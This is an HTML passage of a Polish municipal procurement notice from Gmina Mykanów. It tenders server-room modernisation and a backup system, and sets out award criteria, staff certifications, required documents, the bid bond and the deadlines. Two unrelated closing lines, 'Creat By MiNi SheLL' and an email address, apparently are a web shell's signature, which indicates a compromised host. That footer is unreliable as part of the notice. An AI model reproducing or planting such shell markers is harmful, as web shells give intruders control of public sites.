class="mb-0">35120000-1 - Systemy i urządzenia nadzoru i bezpieczeństwa</p> <p class="mb-0">48517000-5 - Pakiety oprogramowania informatycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji dla serwerów do wirtualizacji oraz macierzy dyskowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Na podstawie art.112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu<br/>w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu;<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie stawia warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu<br/>w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu;<br/>1.3. sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu<br/>w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu;<br/>1.4. zdolności technicznej lub zawodowej<br/>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje osobą, która będzie uczestniczyć w wykonaniu<br/>przedmiotowego zamówienia posiadającą odpowiednie kwalifikacje zawodowe w zakresie IT.<br/>Ze względu na zaawansowane wdrożenie dotyczące krytycznych aplikacji Zamawiającego, wymaga się aby Wykonawca<br/>dysponował odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. dysponuje lub<br/>będzie dysponował osobą lub osobami zdolnymi do wykonania zamówienia.:<br/>• 2 osobami posiadającymi odpowiednie kwalifikacje zawodowe w zakresie:<br/>implementacji środowisk sieciowych i systemowych opartych na platformach Microsoft Server, obejmujące instalowanie i<br/>konfigurowanie elementów systemów oraz posiadającymi wiedzę w zakresie zarządzania tymi środowiskami i<br/>rozwiązywania dotyczących ich problemów, obejmujące administrowanie systemami i obsługę ich użytkowników przy<br/>spełnieniu wymagań dla Microsoft Certified Solutions Associate (MCSA) lub wymagań równoważnych, tj., określonych na<br/>nie niższym poziomie jakości, potwierdzone certyfikatem Microsoft Certified Solutions Associate (MCSA) lub innym<br/>równoważnym dokumentem (zaświadczeniem);<br/>• 2 osobami posiadającymi odpowiednie kwalifikacje zawodowe w zakresie:<br/>definiowania i charakteryzowania najważniejszych technik ataków stosowanych przez hakerów oraz identyfikowania i<br/>analizowania podatności na ataki hakerów w organizacji a także w tworzeniu polityki na urządzeniach IDS/IPS dotyczącej<br/>wykrywania włamań, spełniającej wymagania dla Certified Ethical Hacker (CEH) lub inne równoważne, tj. określone na nie<br/>niższym poziomie jakości niż CEH, potwierdzone certyfikatem ukończenia szkolenia Certified Ethical Hacker (CEH) lub<br/>innym tożsamym dokumentem (zaświadczeniem);<br/>• 1 osoba posiadająca odpowiednie kwalifikacje zawodowe z zakresu konfiguracji i rozwiązywania problemów systemu kopii<br/>zapasowej i replikacji przy użyciu praktyk spełniających wymagania określone dla oferowanego rozwiązania lub inne<br/>równoważne;<br/>• 1 osoba posiadająca odpowiednie kwalifikacje zawodowe z zakresu tworzenia skryptów i programów w języku Python na<br/>posiadanym przez Zamawiającego oprogramowaniu lub systemach operacyjnych. Przy użyciu praktyk spełniających<br/>wymagania dla PCAP - Certified Associate in Python Programming lub inne równoważne, tj. określone na nie niższym<br/>poziomie jakości niż PCAP - Certified Associate in Python Programming, potwierdzone certyfikatem PCAP - Certified<br/>Associate in Python Programming lub innym równoważnym dokumentem (zaświadczeniem);<br/>UWAGA !!!<br/>Zamawiający dopuszcza łączenie posiadanych kwalifikacji przez wskazane osoby, które będą wykonywać niniejsze<br/>zamówienie, pod warunkiem, iż osoba/osoby te spełnia łącznie wymagania dla każdej z łączonej funkcji.<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>Zgodnie z art. 117 ust. 3 ustawy Pzp wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, Zamawiający zamiast podmiotowych środków dowodowych żąda oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, w którym mowa w art.125 ust.1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.1. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu należy przedłożyć:<br/>- wykaz osób ( na potwierdzenie spełnienia warunku należy przedstawić wykaz osób<br/>skierowanych do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji i doświadczenia a także zakresu<br/>wykonywanych przez nie czynności( nalży dołączyć odpowiednie certyfikaty lub zaświadczenia lub inne równoważne dokumenty),<br/>oraz informacją o podstawie do dysponowania tymi osobami podpisany przez osobę uprawnioną sporządzony na podstawie<br/>załącznika nr 6</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1).W celu potwierdzenia zgodności oferowanych dostaw z wymaganiami określonymi w<br/>Opisie przedmiotu zamówienia Zamawiający żąda złożenia przedmiotowego środka<br/>dowodowego w postaci:<br/>• Załącznika nr 1a- wykazu oferowanego sprzętu i usługi – celem potwierdzenia zgodności oferowanych sprzętów/usług z<br/>wszystkimi wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub wymaganiami<br/>związanymi z realizacją zamówienia oraz dołączenie specyfikacji technicznej oferowanych urządzeń tj. serwerów do<br/>wirtualizacji, macierzy dyskowej i przełącznika sieciowego.<br/>• Serwery do wirtualizacji pkt 1:<br/>- Certyfikaty - wydruk ze strony internetowej www.epeat.net potwierdzający spełnienie normy co najmniej Epeat Silver<br/>według normy wprowadzonej w 2019 roku - Wykonawca złoży dokument potwierdzający spełnianie wymogu.<br/>- Warunki gwarancji - dołączenie do oferty oświadczenia Producenta potwierdzające, że Serwis urządzeń będzie<br/>realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta<br/>oraz że Firma serwisująca posiada ISO 9001:2015 oraz ISO-27001 na świadczenie usług serwisowych oraz posiada<br/>autoryzacje producenta urządzeń– dokumenty potwierdzające<br/>• Macierz dyskowa pkt 3:<br/>- Warunki gwarancji - dołączenie do oferty oświadczenia Producenta potwierdzające, że Serwis urządzeń będzie<br/>realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta<br/>oraz że Firma serwisująca posiada ISO 9001:2015 oraz ISO-27001 na świadczenie usług serwisowych oraz posiada<br/>autoryzacje producenta urządzeń– dokumenty potwierdzające<br/>2). Przedmiotowy środek dowodowy wskazany w ust. 1 Wykonawca składa wraz z ofertą.<br/>Brak przekazania załącznika nr. 1a – specyfikacji technicznej oferowanego sprzętu, oświadczeń , certyfikatów lub innych<br/>dokumentów zgodnych z warunkami gwarancji skutkować będzie odrzuceniem oferty.<br/>3).Zamawiający nie przewiduje uzupełnienie przedmiotowego środka dowodowego po złożeniu oferty zgodnie z art. 107 ust.<br/>2 ustaw Pzp <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2. Do oferty, w celu wstępnego wykazania spełniania warunków udziału w postępowaniu oraz braku podstaw do<br/>wykluczenia, Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1)oświadczenie dotyczące przesłanek wykluczenia z postępowania ( oświadczenie należy wypełnić i podpisać przez osoby(<br/>osobę) uprawnioną - załącznik nr 3<br/>2)oświadczenie dotyczące spełniania warunków udziału w postępowaniu oświadczenie wypełnić i podpisać przez<br/>osoby(osobę) uprawniona – załącznik nr 4<br/>3) klauzula informacyjna RODO - oświadczenie składane na druku oferty<br/>4) Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru (jeżeli dotyczy) - w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest<br/>umocowana do jego reprezentowania, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem. Jeżeli Wykonawca<br/>ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast w/w dokumentów składa<br/>dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.<br/>UWAGA: Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych , o ile wykonawca wskaże w formularzu ofertowym dane<br/>umożliwiające dostęp do tych dokumentów.<br/>5) pełnomocnictwo z art.58 ust.2 ustawy, – Pzp ( jeśli dotyczy)<br/>6) pełnomocnictwo dla osoby / osób podpisującej ofertę – pełnomocnictwo dla osoby/ osób podpisującej ofertę, jeżeli nie<br/>figurują one w odpisie z właściwego rejestru. Pełnomocnictwo powinno być złożone w formie oryginału.<br/>7) Wykaz rozwiązań równoważnych<br/>8) zastrzeżenie tajemnicy przedsiębiorstwa<br/>9) zobowiązanie podmiotu udostępniającego zasoby ( w przypadku, gdy wykonawca polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby) w takim przypadku należy również złożyć oświadczenie podmiotu udostępniającego o<br/>braku podstaw do wykluczenia oraz o spełnieniu warunków<br/>10) w przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia ( konsorcja, spółki cywilne), dokumenty lub oświadczenia potwierdzające brak podstaw do wykluczeniu oraz oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu składa każdy z wykonawców oddzielnie, również podmiot udostępniający swoje zasoby<br/>składa te dokumenty. Ponadto wykonawcy wspólnie ubiegający się (konsorcja, spółki cywilne) mają obowiązek złożyć<br/>zgodnie z art.117 ust.4 ustawy Pzp oświadczenie, z którego wynika, które usługi wykonują poszczególni z nich.<br/>Oświadczenie należy złożyć wraz z ofertą opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>osobistym.<br/>11) potwierdzenie wniesienia wadium - wniesienie wadium w poręczeniach lub gwarancjach obejmuje przekazanie tego<br/>dokumentu w takiej formie, w jakiej został on ustanowiony przez gwaranta tj. oryginału dokumentu podpisanego kwalifikowanym podpisem elektronicznym przez jego wystawcę. W przypadku ,gdy wadium zostało wniesione przelewem, zamawiający zaleca załączenie do oferty dokumentu potwierdzającego wniesienie wadium w pieniądzu na rachunek<br/>bankowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> XVIII. Wymagania dotyczące wadium<br/>1.Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 3 500,00 zł ( słownie : trzy tysiące<br/>pięćset złotych)<br/>2. Wadium musi obejmować pełen okres związania ofertą wskazany w pkt XVII ust. 1<br/>3. Wadium może być wniesione w jednej lub kliku formach wskazanych w art. 97 ust.7 ustawy Pzp.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>56 8258 0005 2000 0017 6965 0001 w BS Mykanów<br/>z dopiskiem „ wadium dla zamówienia:”<br/>pn.:<br/>Modernizacja serwerowni oraz wdrożenie systemu tworzenia kopii zapasowych w Urzędzie Gminy Mykanów w ramach<br/>projektu pn. &#34;Cyberbezpieczeństwo Gminy Mykanów&#34;, realizowanego w konkursie granatowym &#34;Cyberbezpieczny<br/>Samorząd&#34;.<br/>Wadium musi wpłynąć na wskazany rachunek zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje<br/>data wpływu na rachunek bankowy zamawiającego).<br/>5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>- nazwę dającego zlecenie ( wykonawcy),beneficjenta gwarancji (zamawiającego), gwaranta /poręczyciela oraz wskazanie<br/>ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu jest Gmina Mykanów ul. Samorządowa 1, 42-233<br/>Mykanów;<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem;<br/>- kwotę gwarancji / poręczenia;<br/>- termin ważności gwarancji/ poręczenia;<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/ poręczenia bezwarunkowo, na pierwsze żądanie zamawiającego,<br/>w sytuacjach określonych w art. 98 ust.6 ustawy Pzp.<br/>6. W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym<br/>mowa w art. 98 ust.2 pkt. 3, zamawiający odrzuci ofertę na podstawie art.226 ust.1 pkt.14 ustawy Pzp.<br/>7. Zamawiający dokona zwrotu wadium na zasadach określonych w art.98 ust.1 – 5 ustawy Pzp.<br/>8. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art.98 ust.6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.pełnomocnictwo z art.58 ust.2 ustawy, – Pzp ( jeśli dotyczy)<br/>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia przedkładają pełnomocnictwo do reprezentowania ich zgodnie<br/>z art.58 ust.2 ustawy Pzp. Pełnomocnictwo powinno być załączone do oferty w formie oryginału. Jeżeli dokument został<br/>sporządzony w postaci papierowej i opatrzony własnoręcznym podpisem, Wykonawca przekazuje cyfrowe odwzorowanie<br/>tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym<br/>poświadczającym zgodność odwzorowania z dokumentem w postaci papierowej. Dopuszcza się również przedłożenie<br/>elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza tj. podpisanej kwalifikowanym<br/>podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym osoby posiadającej uprawnienia notariusza.<br/>(dotyczy również wspólników spółki cywilnej, chyba że upoważnienie/pełnomocnictwo do występowania w imieniu spółki<br/>cywilnej wynikać będzie z dołączonej do oferty umowy spółki cywilnej, bądź wszyscy wspólnicy spółki podpiszą ofertę).<br/>5. W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcja, spółki<br/>cywilne), dokumenty lub oświadczenia potwierdzające brak podstaw do wykluczeniu oraz oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu składa każdy z wykonawców oddzielnie, również podmiot udostępniający swoje zasoby<br/>składa te dokumenty. Ponadto wykonawcy wspólnie ubiegający się (konsorcja, spółki cywilne) mają obowiązek złożyć<br/>zgodnie z art. 117 ust.4 ustawy Pzp oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują<br/>poszczególni z nich. Oświadczenie należy złożyć wraz z ofertą opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian został określony w § 11 umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-27 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mykanow/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-27 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie dodatkowe informacje zawarte są w SWZ i załącznikach

Creat By MiNi SheLL
Email: jattceo@gmail.com